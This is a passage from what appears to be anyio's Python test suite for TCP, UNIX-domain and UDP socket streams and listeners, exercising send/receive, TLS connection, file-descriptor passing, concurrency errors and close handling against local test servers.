    """Patch socket.getaddrinfo so IPv4 results sort ahead of IPv6 ones."""
    real_getaddrinfo = socket.getaddrinfo

    def sorted_getaddrinfo(*args: Any, **kwargs: Any) -> object:
        # Return IPv4 addresses first so the IPv6 preference can be observed
        entries = real_getaddrinfo(*args, **kwargs)
        return sorted(entries, key=lambda entry: entry[0])

    monkeypatch.setattr("socket.getaddrinfo", sorted_getaddrinfo)
@pytest.fixture(
    params=[
        pytest.param(AddressFamily.AF_INET, id="ipv4"),
        pytest.param(
            AddressFamily.AF_INET6,
            id="ipv6",
            marks=[pytest.mark.skipif(not has_ipv6, reason="no IPv6 support")],
        ),
    ]
)
def family(request: SubRequest) -> AnyIPAddressFamily:
    # Parametrized address family; the IPv6 variant only runs on hosts with IPv6.
    return request.param
@pytest.fixture
def check_asyncio_bug(anyio_backend_name: str, family: AnyIPAddressFamily) -> None:
    """Skip tests hitting the Windows proactor IPv6 bug (bpo-39148)."""
    if anyio_backend_name != "asyncio" or sys.platform != "win32":
        return
    if family != AddressFamily.AF_INET6:
        return
    import asyncio

    policy = asyncio.get_event_loop_policy()
    if policy.__class__.__name__ == "WindowsProactorEventLoopPolicy":
        pytest.skip("Does not work due to a known bug (39148)")
_T = TypeVar("_T")


def _identity(v: _T) -> _T:
    """Return *v* unchanged (used as a no-op class decorator off Windows)."""
    return v
# _ProactorBasePipeTransport.abort() after _ProactorBasePipeTransport.close()
# does not cancel writes: https://bugs.python.org/issue44428
# On win32 this decorates the test class with filterwarnings marks that
# silence the resulting ResourceWarnings; elsewhere it is a no-op (_identity).
_ignore_win32_resource_warnings = (
    pytest.mark.filterwarnings(
        "ignore:unclosed <socket.socket:ResourceWarning",
        "ignore:unclosed transport <_ProactorSocketTransport closing:ResourceWarning",
    )
    if sys.platform == "win32"
    else _identity
)
@_ignore_win32_resource_warnings  # type: ignore[operator]
class TestTCPStream:
    """Tests for TCP SocketStream behaviour.

    Each test talks to a plain blocking server socket that is driven either
    inline or from a helper thread, so only the client side runs under anyio.
    """

    @pytest.fixture
    def server_sock(self, family: AnyIPAddressFamily) -> Iterator[socket.socket]:
        # Blocking listener the tests accept() on manually.
        sock = socket.socket(family, socket.SOCK_STREAM)
        sock.settimeout(1)
        sock.bind(("localhost", 0))
        sock.listen()
        yield sock
        sock.close()

    @pytest.fixture
    def server_addr(self, server_sock: socket.socket) -> Tuple[str, int]:
        # (host, port) of the fixture listener.
        return server_sock.getsockname()[:2]

    async def test_extra_attributes(
        self,
        server_sock: socket.socket,
        server_addr: Tuple[str, int],
        family: AnyIPAddressFamily,
    ) -> None:
        async with await connect_tcp(*server_addr) as stream:
            raw_socket = stream.extra(SocketAttribute.raw_socket)
            assert stream.extra(SocketAttribute.family) == family
            assert (
                stream.extra(SocketAttribute.local_address)
                == raw_socket.getsockname()[:2]
            )
            assert (
                stream.extra(SocketAttribute.local_port) == raw_socket.getsockname()[1]
            )
            assert stream.extra(SocketAttribute.remote_address) == server_addr
            assert stream.extra(SocketAttribute.remote_port) == server_addr[1]

    async def test_send_receive(
        self, server_sock: socket.socket, server_addr: Tuple[str, int]
    ) -> None:
        async with await connect_tcp(*server_addr) as stream:
            client, _ = server_sock.accept()
            await stream.send(b"blah")
            request = client.recv(100)
            client.sendall(request[::-1])
            response = await stream.receive()
            client.close()

        assert response == b"halb"

    async def test_send_large_buffer(
        self, server_sock: socket.socket, server_addr: Tuple[str, int]
    ) -> None:
        def serve() -> None:
            client, _ = server_sock.accept()
            client.sendall(buffer)
            client.close()

        buffer = (
            b"\xff" * 1024 * 1024
        )  # should exceed the maximum kernel send buffer size
        async with await connect_tcp(*server_addr) as stream:
            thread = Thread(target=serve, daemon=True)
            thread.start()
            response = b""
            while len(response) < len(buffer):
                response += await stream.receive()

        thread.join()
        assert response == buffer

    async def test_send_eof(
        self, server_sock: socket.socket, server_addr: Tuple[str, int]
    ) -> None:
        def serve() -> None:
            client, _ = server_sock.accept()
            request = b""
            while True:
                data = client.recv(100)
                request += data
                if not data:
                    break

            client.sendall(request[::-1])
            client.close()

        async with await connect_tcp(*server_addr) as stream:
            thread = Thread(target=serve, daemon=True)
            thread.start()
            await stream.send(b"hello, ")
            await stream.send(b"world\n")
            await stream.send_eof()
            response = await stream.receive()

        thread.join()
        assert response == b"\ndlrow ,olleh"

    async def test_iterate(
        self, server_sock: socket.socket, server_addr: Tuple[str, int]
    ) -> None:
        def serve() -> None:
            client, _ = server_sock.accept()
            client.sendall(b"bl")
            event.wait(1)
            client.sendall(b"ah")
            client.close()

        event = threading.Event()
        thread = Thread(target=serve, daemon=True)
        thread.start()
        chunks = []
        async with await connect_tcp(*server_addr) as stream:
            async for chunk in stream:
                chunks.append(chunk)
                event.set()

        thread.join()
        assert chunks == [b"bl", b"ah"]

    async def test_socket_options(
        self, family: AnyIPAddressFamily, server_addr: Tuple[str, int]
    ) -> None:
        async with await connect_tcp(*server_addr) as stream:
            raw_socket = stream.extra(SocketAttribute.raw_socket)
            # TCP_NODELAY is expected to be enabled on outgoing streams
            assert raw_socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY) != 0

    @pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
    @pytest.mark.parametrize(
        "local_addr, expected_client_addr",
        [
            pytest.param("", "::1", id="dualstack"),
            pytest.param("127.0.0.1", "127.0.0.1", id="ipv4"),
            pytest.param("::1", "::1", id="ipv6"),
        ],
    )
    async def test_happy_eyeballs(
        self, local_addr: str, expected_client_addr: str, fake_localhost_dns: None
    ) -> None:
        client_addr = None, None

        def serve() -> None:
            nonlocal client_addr
            client, client_addr = server_sock.accept()
            client.close()

        family = (
            AddressFamily.AF_INET
            if local_addr == "127.0.0.1"
            else AddressFamily.AF_INET6
        )
        server_sock = socket.socket(family)
        server_sock.bind((local_addr, 0))
        server_sock.listen()
        port = server_sock.getsockname()[1]
        thread = Thread(target=serve, daemon=True)
        thread.start()

        async with await connect_tcp("localhost", port):
            pass

        thread.join()
        server_sock.close()
        assert client_addr[0] == expected_client_addr

    @pytest.mark.parametrize(
        "target, exception_class",
        [
            pytest.param(
                "localhost",
                ExceptionGroup,
                id="multi",
                marks=[
                    pytest.mark.skipif(not has_ipv6, reason="IPv6 is not available")
                ],
            ),
            pytest.param("127.0.0.1", ConnectionRefusedError, id="single"),
        ],
    )
    async def test_connection_refused(
        self,
        target: str,
        exception_class: Union[Type[ExceptionGroup], Type[ConnectionRefusedError]],
        fake_localhost_dns: None,
    ) -> None:
        # Bind-then-close to find a port that is (almost certainly) free.
        dummy_socket = socket.socket(AddressFamily.AF_INET6)
        dummy_socket.bind(("::", 0))
        free_port = dummy_socket.getsockname()[1]
        dummy_socket.close()

        with pytest.raises(OSError) as exc:
            await connect_tcp(target, free_port)

        assert exc.match("All connection attempts failed")
        assert isinstance(exc.value.__cause__, exception_class)
        if isinstance(exc.value.__cause__, ExceptionGroup):
            for exception in exc.value.__cause__.exceptions:
                assert isinstance(exception, ConnectionRefusedError)

    async def test_receive_timeout(
        self, server_sock: socket.socket, server_addr: Tuple[str, int]
    ) -> None:
        def serve() -> None:
            conn, _ = server_sock.accept()
            time.sleep(1)
            conn.close()

        thread = Thread(target=serve, daemon=True)
        thread.start()
        async with await connect_tcp(*server_addr) as stream:
            start_time = time.monotonic()
            with move_on_after(0.1):
                while time.monotonic() - start_time < 0.3:
                    await stream.receive(1)

                pytest.fail("The timeout was not respected")

    async def test_concurrent_send(self, server_addr: Tuple[str, int]) -> None:
        async def send_data() -> NoReturn:
            while True:
                await stream.send(b"\x00" * 4096)

        async with await connect_tcp(*server_addr) as stream:
            async with create_task_group() as tg:
                tg.start_soon(send_data)
                await wait_all_tasks_blocked()
                with pytest.raises(BusyResourceError) as exc:
                    await stream.send(b"foo")

                exc.match("already writing to")
                tg.cancel_scope.cancel()

    async def test_concurrent_receive(self, server_addr: Tuple[str, int]) -> None:
        async with await connect_tcp(*server_addr) as client:
            async with create_task_group() as tg:
                tg.start_soon(client.receive)
                await wait_all_tasks_blocked()
                try:
                    with pytest.raises(BusyResourceError) as exc:
                        await client.receive()

                    exc.match("already reading from")
                finally:
                    tg.cancel_scope.cancel()

    async def test_close_during_receive(self, server_addr: Tuple[str, int]) -> None:
        async def interrupt() -> None:
            await wait_all_tasks_blocked()
            await stream.aclose()

        async with await connect_tcp(*server_addr) as stream:
            async with create_task_group() as tg:
                tg.start_soon(interrupt)
                with pytest.raises(ClosedResourceError):
                    await stream.receive()

    async def test_receive_after_close(self, server_addr: Tuple[str, int]) -> None:
        stream = await connect_tcp(*server_addr)
        await stream.aclose()
        with pytest.raises(ClosedResourceError):
            await stream.receive()

    async def test_send_after_close(self, server_addr: Tuple[str, int]) -> None:
        stream = await connect_tcp(*server_addr)
        await stream.aclose()
        with pytest.raises(ClosedResourceError):
            await stream.send(b"foo")

    async def test_send_after_peer_closed(self, family: AnyIPAddressFamily) -> None:
        def serve_once() -> None:
            client_sock, _ = server_sock.accept()
            client_sock.close()
            server_sock.close()

        server_sock = socket.socket(family, socket.SOCK_STREAM)
        server_sock.settimeout(1)
        server_sock.bind(("localhost", 0))
        server_addr = server_sock.getsockname()[:2]
        server_sock.listen()
        thread = Thread(target=serve_once, daemon=True)
        thread.start()
        # Repeated sends into a closed peer must eventually surface the error.
        with pytest.raises(BrokenResourceError):
            async with await connect_tcp(*server_addr) as stream:
                for _ in range(1000):
                    await stream.send(b"foo")

        thread.join()

    async def test_connect_tcp_with_tls(
        self,
        server_context: SSLContext,
        client_context: SSLContext,
        server_sock: socket.socket,
        server_addr: Tuple[str, int],
    ) -> None:
        def serve() -> None:
            with suppress(socket.timeout):
                client, addr = server_sock.accept()
                client.settimeout(1)
                client = server_context.wrap_socket(client, server_side=True)
                data = client.recv(100)
                client.sendall(data[::-1])
                client.unwrap()
                client.close()

        # The TLSStream tests are more comprehensive than this one!
        thread = Thread(target=serve, daemon=True)
        thread.start()
        async with await connect_tcp(
            *server_addr, tls_hostname="localhost", ssl_context=client_context
        ) as stream:
            await stream.send(b"hello")
            response = await stream.receive()

        assert response == b"olleh"
        thread.join()

    async def test_connect_tcp_with_tls_cert_check_fail(
        self,
        server_context: SSLContext,
        server_sock: socket.socket,
        server_addr: Tuple[str, int],
    ) -> None:
        thread_exception = None

        def serve() -> None:
            nonlocal thread_exception
            client, addr = server_sock.accept()
            with client:
                client.settimeout(1)
                try:
                    server_context.wrap_socket(client, server_side=True)
                except OSError:
                    pass
                except BaseException as exc:
                    thread_exception = exc

        thread = Thread(target=serve, daemon=True)
        thread.start()
        # No client ssl_context is given, so certificate verification must fail.
        with pytest.raises(SSLError):
            await connect_tcp(*server_addr, tls_hostname="localhost")

        thread.join()
        assert thread_exception is None

    @pytest.mark.parametrize("anyio_backend", ["asyncio"])
    async def test_unretrieved_future_exception_server_crash(
        self, family: AnyIPAddressFamily, caplog: LogCaptureFixture
    ) -> None:
        """
        Tests that there won't be any leftover Futures that don't get their exceptions retrieved.

        See https://github.com/encode/httpcore/issues/382 for details.
        """

        def serve() -> None:
            sock, addr = server_sock.accept()
            event.wait(3)
            del sock
            gc.collect()

        server_sock = socket.socket(family, socket.SOCK_STREAM)
        server_sock.settimeout(1)
        server_sock.bind(("localhost", 0))
        server_sock.listen()
        server_addr = server_sock.getsockname()[:2]
        event = threading.Event()
        thread = Thread(target=serve)
        thread.start()
        async with await connect_tcp(*server_addr) as stream:
            await stream.send(b"GET")
            event.set()
            with pytest.raises(BrokenResourceError):
                await stream.receive()

        thread.join()
        gc.collect()
        # Nothing should have been logged about unretrieved exceptions.
        assert not caplog.text
class TestTCPListener:
    """Tests for TCP listeners (MultiListener of SocketListeners)."""

    async def test_extra_attributes(self, family: AnyIPAddressFamily) -> None:
        async with await create_tcp_listener(
            local_host="localhost", family=family
        ) as multi:
            assert multi.extra(SocketAttribute.family) == family
            for listener in multi.listeners:
                raw_socket = listener.extra(SocketAttribute.raw_socket)
                assert listener.extra(SocketAttribute.family) == family
                assert (
                    listener.extra(SocketAttribute.local_address)
                    == raw_socket.getsockname()[:2]
                )
                assert (
                    listener.extra(SocketAttribute.local_port)
                    == raw_socket.getsockname()[1]
                )
                # A listener has no peer, so remote attributes must not resolve.
                pytest.raises(
                    TypedAttributeLookupError,
                    listener.extra,
                    SocketAttribute.remote_address,
                )
                pytest.raises(
                    TypedAttributeLookupError,
                    listener.extra,
                    SocketAttribute.remote_port,
                )

    @pytest.mark.parametrize(
        "family",
        [
            pytest.param(AddressFamily.AF_INET, id="ipv4"),
            pytest.param(
                AddressFamily.AF_INET6,
                id="ipv6",
                marks=[pytest.mark.skipif(not has_ipv6, reason="no IPv6 support")],
            ),
            pytest.param(
                socket.AF_UNSPEC,
                id="both",
                marks=[pytest.mark.skipif(not has_ipv6, reason="no IPv6 support")],
            ),
        ],
    )
    async def test_accept(self, family: AnyIPAddressFamily) -> None:
        async with await create_tcp_listener(
            local_host="localhost", family=family
        ) as multi:
            for listener in multi.listeners:
                client = socket.socket(listener.extra(SocketAttribute.family))
                client.settimeout(1)
                client.connect(listener.extra(SocketAttribute.local_address))
                assert isinstance(listener, SocketListener)
                stream = await listener.accept()
                client.sendall(b"blah")
                request = await stream.receive()
                await stream.send(request[::-1])
                assert client.recv(100) == b"halb"
                client.close()
                await stream.aclose()

    async def test_accept_after_close(self, family: AnyIPAddressFamily) -> None:
        async with await create_tcp_listener(
            local_host="localhost", family=family
        ) as multi:
            for listener in multi.listeners:
                await listener.aclose()
                assert isinstance(listener, SocketListener)
                with pytest.raises(ClosedResourceError):
                    await listener.accept()

    async def test_socket_options(self, family: AnyIPAddressFamily) -> None:
        async with await create_tcp_listener(
            local_host="localhost", family=family
        ) as multi:
            for listener in multi.listeners:
                raw_socket = listener.extra(SocketAttribute.raw_socket)
                # Windows uses SO_EXCLUSIVEADDRUSE instead of SO_REUSEADDR.
                if sys.platform == "win32":
                    assert (
                        raw_socket.getsockopt(
                            socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE
                        )
                        != 0
                    )
                else:
                    assert (
                        raw_socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
                        != 0
                    )

                # Kernels may double the requested receive buffer size.
                raw_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 80000)
                assert raw_socket.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) in (
                    80000,
                    160000,
                )

                client = socket.socket(raw_socket.family)
                client.settimeout(1)
                client.connect(raw_socket.getsockname())

                assert isinstance(listener, SocketListener)
                async with await listener.accept() as stream:
                    raw_socket = stream.extra(SocketAttribute.raw_socket)
                    assert raw_socket.gettimeout() == 0
                    assert raw_socket.family == listener.extra(SocketAttribute.family)
                    assert (
                        raw_socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
                        != 0
                    )

                client.close()

    @pytest.mark.skipif(
        not hasattr(socket, "SO_REUSEPORT"), reason="SO_REUSEPORT option not supported"
    )
    async def test_reuse_port(self, family: AnyIPAddressFamily) -> None:
        # Two listeners must be able to share the same port with reuse_port=True.
        multi1 = await create_tcp_listener(
            local_host="localhost", family=family, reuse_port=True
        )
        assert len(multi1.listeners) == 1

        multi2 = await create_tcp_listener(
            local_host="localhost",
            local_port=multi1.listeners[0].extra(SocketAttribute.local_port),
            family=family,
            reuse_port=True,
        )
        assert len(multi2.listeners) == 1

        assert multi1.listeners[0].extra(
            SocketAttribute.local_address
        ) == multi2.listeners[0].extra(SocketAttribute.local_address)
        await multi1.aclose()
        await multi2.aclose()

    async def test_close_from_other_task(self, family: AnyIPAddressFamily) -> None:
        listener = await create_tcp_listener(local_host="localhost", family=family)
        with pytest.raises(ClosedResourceError):
            async with create_task_group() as tg:
                tg.start_soon(listener.serve, lambda stream: None)
                await wait_all_tasks_blocked()
                await listener.aclose()
                tg.cancel_scope.cancel()

    async def test_send_after_eof(self, family: AnyIPAddressFamily) -> None:
        async def handle(stream: SocketStream) -> None:
            async with stream:
                await stream.send(b"Hello\n")

        multi = await create_tcp_listener(family=family, local_host="localhost")
        async with multi, create_task_group() as tg:
            tg.start_soon(multi.serve, handle)
            await wait_all_tasks_blocked()

            with socket.socket(family) as client:
                client.connect(multi.extra(SocketAttribute.local_address))
                # Half-close the client first; the server must still be able to send.
                client.shutdown(socket.SHUT_WR)
                client.setblocking(False)
                with fail_after(1):
                    while True:
                        try:
                            message = client.recv(10)
                        except BlockingIOError:
                            await sleep(0)
                        else:
                            assert message == b"Hello\n"
                            break

            tg.cancel_scope.cancel()
@pytest.mark.skipif(
sys.platform == "win32", reason="UNIX sockets are not available on Windows"
)
class TestUNIXStream:
@pytest.fixture
def socket_path(self, tmp_path_factory: TempPathFactory) -> Path:
return tmp_path_factory.mktemp("unix").joinpath("socket")
@pytest.fixture(params=[False, True], ids=["str", "path"])
def socket_path_or_str(
self, request: SubRequest, socket_path: Path
) -> Union[Path, str]:
return socket_path if request.param else str(socket_path)
@pytest.fixture
def server_sock(self, socket_path: Path) -> Iterable[socket.socket]:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(1)
sock.bind(str(socket_path))
sock.listen()
yield sock
sock.close()
async def test_extra_attributes(
self, server_sock: socket.socket, socket_path: Path
) -> None:
async with await connect_unix(socket_path) as stream:
raw_socket = stream.extra(SocketAttribute.raw_socket)
assert stream.extra(SocketAttribute.family) == socket.AF_UNIX
assert (
stream.extra(SocketAttribute.local_address) == raw_socket.getsockname()
)
assert stream.extra(SocketAttribute.remote_address) == str(socket_path)
pytest.raises(
TypedAttributeLookupError, stream.extra, SocketAttribute.local_port
)
pytest.raises(
TypedAttributeLookupError, stream.extra, SocketAttribute.remote_port
)
async def test_send_receive(
self, server_sock: socket.socket, socket_path_or_str: Union[Path, str]
) -> None:
async with await connect_unix(socket_path_or_str) as stream:
client, _ = server_sock.accept()
await stream.send(b"blah")
request = client.recv(100)
client.sendall(request[::-1])
response = await stream.receive()
client.close()
assert response == b"halb"
async def test_send_large_buffer(
self, server_sock: socket.socket, socket_path: Path
) -> None:
def serve() -> None:
client, _ = server_sock.accept()
client.sendall(buffer)
client.close()
buffer = (
b"\xff" * 1024 * 1024
) # should exceed the maximum kernel send buffer size
async with await connect_unix(socket_path) as stream:
thread = Thread(target=serve, daemon=True)
thread.start()
response = b""
while len(response) < len(buffer):
response += await stream.receive()
thread.join()
assert response == buffer
async def test_receive_fds(
    self, server_sock: socket.socket, socket_path: Path, tmp_path: Path
) -> None:
    """File descriptors sent via SCM_RIGHTS are received and usable."""
    def serve() -> None:
        # Open two files and pass their descriptors as ancillary data.
        path1 = tmp_path / "file1"
        path2 = tmp_path / "file2"
        path1.write_text("Hello, ")
        path2.write_text("World!")
        with path1.open() as file1, path2.open() as file2:
            fdarray = array.array("i", [file1.fileno(), file2.fileno()])
            client, _ = server_sock.accept()
            cmsg = (socket.SOL_SOCKET, socket.SCM_RIGHTS, fdarray)
            with client:
                client.sendmsg([b"test"], [cmsg])

    async with await connect_unix(socket_path) as stream:
        thread = Thread(target=serve, daemon=True)
        thread.start()
        message, fds = await stream.receive_fds(10, 2)
        thread.join()

    # The received descriptors are duplicates; read through them to verify.
    text = ""
    for fd in fds:
        with os.fdopen(fd) as file:
            text += file.read()

    assert message == b"test"
    assert text == "Hello, World!"
async def test_receive_fds_bad_args(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """receive_fds() validates msglen and maxfds before touching the socket."""
    async with await connect_unix(socket_path) as stream:
        for msglen in (-1, "foo"):
            with pytest.raises(
                ValueError, match="msglen must be a non-negative integer"
            ):
                await stream.receive_fds(msglen, 0)  # type: ignore[arg-type]

        for maxfds in (0, "foo"):
            with pytest.raises(
                ValueError, match="maxfds must be a positive integer"
            ):
                await stream.receive_fds(0, maxfds)  # type: ignore[arg-type]
async def test_send_fds(
    self, server_sock: socket.socket, socket_path: Path, tmp_path: Path
) -> None:
    """send_fds() delivers open file objects as SCM_RIGHTS descriptors."""
    def serve() -> None:
        # Receive the message plus ancillary data and rebuild the fd array.
        fds = array.array("i")
        client, _ = server_sock.accept()
        msg, ancdata, *_ = client.recvmsg(10, socket.CMSG_LEN(2 * fds.itemsize))
        client.close()
        assert msg == b"test"
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            assert cmsg_level == socket.SOL_SOCKET
            assert cmsg_type == socket.SCM_RIGHTS
            # Truncate any partial trailing item before decoding the fds.
            fds.frombytes(
                cmsg_data[: len(cmsg_data) - (len(cmsg_data) % fds.itemsize)]
            )

        text = ""
        for fd in fds:
            with os.fdopen(fd) as file:
                text += file.read()

        assert text == "Hello, World!"

    path1 = tmp_path / "file1"
    path2 = tmp_path / "file2"
    path1.write_text("Hello, ")
    path2.write_text("World!")
    with path1.open() as file1, path2.open() as file2, fail_after(2):
        assert isinstance(file1, io.TextIOWrapper)
        assert isinstance(file2, io.TextIOWrapper)
        async with await connect_unix(socket_path) as stream:
            thread = Thread(target=serve, daemon=True)
            thread.start()
            await stream.send_fds(b"test", [file1, file2])
            thread.join()
async def test_send_eof(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """send_eof() half-closes the stream; the peer sees EOF and replies."""
    def serve() -> None:
        # Read until EOF, then echo the reversed request back.
        client, _ = server_sock.accept()
        request = b""
        while True:
            data = client.recv(100)
            request += data
            if not data:
                break

        client.sendall(request[::-1])
        client.close()

    async with await connect_unix(socket_path) as stream:
        thread = Thread(target=serve, daemon=True)
        thread.start()
        await stream.send(b"hello, ")
        await stream.send(b"world\n")
        await stream.send_eof()
        response = await stream.receive()

    thread.join()
    assert response == b"\ndlrow ,olleh"
async def test_iterate(self, server_sock: socket.socket, socket_path: Path) -> None:
    """Async iteration yields each chunk as sent and ends when the peer closes."""
    def serve() -> None:
        client, _ = server_sock.accept()
        client.sendall(b"bl")
        # Small delay so the two sends arrive as separate chunks.
        time.sleep(0.05)
        client.sendall(b"ah")
        client.close()

    thread = Thread(target=serve, daemon=True)
    thread.start()
    chunks = []
    async with await connect_unix(socket_path) as stream:
        async for chunk in stream:
            chunks.append(chunk)

    thread.join()
    assert chunks == [b"bl", b"ah"]
async def test_send_fds_bad_args(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """send_fds() rejects an empty message and an empty fd list."""
    async with await connect_unix(socket_path) as stream:
        with pytest.raises(ValueError, match="message must not be empty"):
            await stream.send_fds(b"", [0])

        with pytest.raises(ValueError, match="fds must not be empty"):
            await stream.send_fds(b"test", [])
async def test_concurrent_send(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """A second concurrent send() raises BusyResourceError."""
    async def send_data() -> NoReturn:
        # Keep sending until the socket buffer fills and the task blocks.
        while True:
            await client.send(b"\x00" * 4096)

    async with await connect_unix(socket_path) as client:
        async with create_task_group() as tg:
            tg.start_soon(send_data)
            await wait_all_tasks_blocked()
            with pytest.raises(BusyResourceError) as exc:
                await client.send(b"foo")

            exc.match("already writing to")
            tg.cancel_scope.cancel()
async def test_concurrent_receive(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """A second concurrent receive() raises BusyResourceError."""
    async with await connect_unix(socket_path) as client:
        async with create_task_group() as tg:
            tg.start_soon(client.receive)
            await wait_all_tasks_blocked()
            try:
                with pytest.raises(BusyResourceError) as exc:
                    await client.receive()

                exc.match("already reading from")
            finally:
                # Always unblock the background receive task.
                tg.cancel_scope.cancel()
async def test_close_during_receive(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """Closing the stream while receive() is blocked raises ClosedResourceError."""
    async def interrupt() -> None:
        # Wait until receive() below is parked, then close under it.
        await wait_all_tasks_blocked()
        await stream.aclose()

    async with await connect_unix(socket_path) as stream:
        async with create_task_group() as tg:
            tg.start_soon(interrupt)
            with pytest.raises(ClosedResourceError):
                await stream.receive()
async def test_receive_after_close(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """receive() on an already-closed stream raises ClosedResourceError."""
    stream = await connect_unix(socket_path)
    await stream.aclose()
    with pytest.raises(ClosedResourceError):
        await stream.receive()
async def test_send_after_close(
    self, server_sock: socket.socket, socket_path: Path
) -> None:
    """send() on an already-closed stream raises ClosedResourceError."""
    stream = await connect_unix(socket_path)
    await stream.aclose()
    with pytest.raises(ClosedResourceError):
        await stream.send(b"foo")
async def test_cannot_connect(self, socket_path: Path) -> None:
    """Connecting to a nonexistent socket path raises FileNotFoundError."""
    with pytest.raises(FileNotFoundError):
        await connect_unix(socket_path)
@pytest.mark.skipif(
    sys.platform == "win32", reason="UNIX sockets are not available on Windows"
)
class TestUNIXListener:
    """Tests for listeners bound to UNIX domain sockets."""

    @pytest.fixture
    def socket_path(self, tmp_path_factory: TempPathFactory) -> Path:
        # Fresh per-test path; the socket file is created by the listener.
        return tmp_path_factory.mktemp("unix").joinpath("socket")

    @pytest.fixture(params=[False, True], ids=["str", "path"])
    def socket_path_or_str(
        self, request: SubRequest, socket_path: Path
    ) -> Union[Path, str]:
        # Exercise both accepted path representations.
        return socket_path if request.param else str(socket_path)

    async def test_extra_attributes(self, socket_path: Path) -> None:
        """UNIX listeners expose family/local address but no ports or peers."""
        async with await create_unix_listener(socket_path) as listener:
            raw_socket = listener.extra(SocketAttribute.raw_socket)
            assert listener.extra(SocketAttribute.family) == socket.AF_UNIX
            assert (
                listener.extra(SocketAttribute.local_address)
                == raw_socket.getsockname()
            )
            pytest.raises(
                TypedAttributeLookupError, listener.extra, SocketAttribute.local_port
            )
            pytest.raises(
                TypedAttributeLookupError,
                listener.extra,
                SocketAttribute.remote_address,
            )
            pytest.raises(
                TypedAttributeLookupError, listener.extra, SocketAttribute.remote_port
            )

    async def test_accept(self, socket_path_or_str: Union[Path, str]) -> None:
        """A blocking stdlib client can connect and round-trip data."""
        async with await create_unix_listener(socket_path_or_str) as listener:
            client = socket.socket(socket.AF_UNIX)
            client.settimeout(1)
            client.connect(str(socket_path_or_str))
            stream = await listener.accept()
            client.sendall(b"blah")
            request = await stream.receive()
            await stream.send(request[::-1])
            assert client.recv(100) == b"halb"
            client.close()
            await stream.aclose()

    async def test_socket_options(self, socket_path: Path) -> None:
        """Raw-socket options are tunable; accepted streams are non-blocking."""
        async with await create_unix_listener(socket_path) as listener:
            listener_socket = listener.extra(SocketAttribute.raw_socket)
            assert listener_socket.family == socket.AddressFamily.AF_UNIX
            listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 80000)
            # Linux doubles the requested buffer size, hence two accepted values.
            assert listener_socket.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) in (
                80000,
                160000,
            )
            client = socket.socket(listener_socket.family)
            client.settimeout(1)
            client.connect(listener_socket.getsockname())
            async with await listener.accept() as stream:
                assert stream.extra(SocketAttribute.raw_socket).gettimeout() == 0
                assert stream.extra(SocketAttribute.family) == listener_socket.family

            client.close()

    async def test_send_after_eof(self, socket_path: Path) -> None:
        """The server can still send after the client shuts down its write side."""
        async def handle(stream: SocketStream) -> None:
            async with stream:
                await stream.send(b"Hello\n")

        async with await create_unix_listener(
            socket_path
        ) as listener, create_task_group() as tg:
            tg.start_soon(listener.serve, handle)
            await wait_all_tasks_blocked()
            with socket.socket(socket.AF_UNIX) as client:
                client.connect(str(socket_path))
                client.shutdown(socket.SHUT_WR)
                client.setblocking(False)
                with fail_after(1):
                    # Poll the non-blocking socket, yielding to the event loop
                    # between attempts so the handler gets to run.
                    while True:
                        try:
                            message = client.recv(10)
                        except BlockingIOError:
                            await sleep(0)
                        else:
                            assert message == b"Hello\n"
                            break

            tg.cancel_scope.cancel()

    async def test_bind_twice(self, socket_path: Path) -> None:
        """Test that the previous socket is removed before binding to the path."""
        for _ in range(2):
            async with await create_unix_listener(socket_path):
                pass
async def test_multi_listener(tmp_path_factory: TempPathFactory) -> None:
    """MultiListener serves connections arriving on all child listeners."""
    async def handle(stream: SocketStream) -> None:
        client_addresses.append(stream.extra(SocketAttribute.remote_address))
        event.set()
        await stream.aclose()

    client_addresses: List[Union[str, IPSockAddrType]] = []
    listeners: List[Listener] = [await create_tcp_listener(local_host="localhost")]
    if sys.platform != "win32":
        # Add a UNIX listener where the platform supports it.
        socket_path = tmp_path_factory.mktemp("unix").joinpath("socket")
        listeners.append(await create_unix_listener(socket_path))

    expected_addresses: List[Union[str, IPSockAddrType]] = []
    async with MultiListener(listeners) as multi_listener:
        async with create_task_group() as tg:
            tg.start_soon(multi_listener.serve, handle)
            for listener in multi_listener.listeners:
                event = Event()
                local_address = listener.extra(SocketAttribute.local_address)
                if (
                    sys.platform != "win32"
                    and listener.extra(SocketAttribute.family)
                    == socket.AddressFamily.AF_UNIX
                ):
                    assert isinstance(local_address, str)
                    stream: SocketStream = await connect_unix(local_address)
                else:
                    assert isinstance(local_address, tuple)
                    stream = await connect_tcp(*local_address)

                expected_addresses.append(stream.extra(SocketAttribute.local_address))
                await event.wait()
                await stream.aclose()

            tg.cancel_scope.cancel()

    assert client_addresses == expected_addresses
@pytest.mark.usefixtures("check_asyncio_bug")
class TestUDPSocket:
    """Tests for unconnected (sendto-style) UDP sockets."""

    async def test_extra_attributes(self, family: AnyIPAddressFamily) -> None:
        """A bound UDP socket exposes local attributes but no remote ones."""
        async with await create_udp_socket(
            family=family, local_host="localhost"
        ) as udp:
            raw_socket = udp.extra(SocketAttribute.raw_socket)
            assert raw_socket.gettimeout() == 0
            assert udp.extra(SocketAttribute.family) == family
            assert (
                udp.extra(SocketAttribute.local_address) == raw_socket.getsockname()[:2]
            )
            assert udp.extra(SocketAttribute.local_port) == raw_socket.getsockname()[1]
            pytest.raises(
                TypedAttributeLookupError, udp.extra, SocketAttribute.remote_address
            )
            pytest.raises(
                TypedAttributeLookupError, udp.extra, SocketAttribute.remote_port
            )

    async def test_send_receive(self, family: AnyIPAddressFamily) -> None:
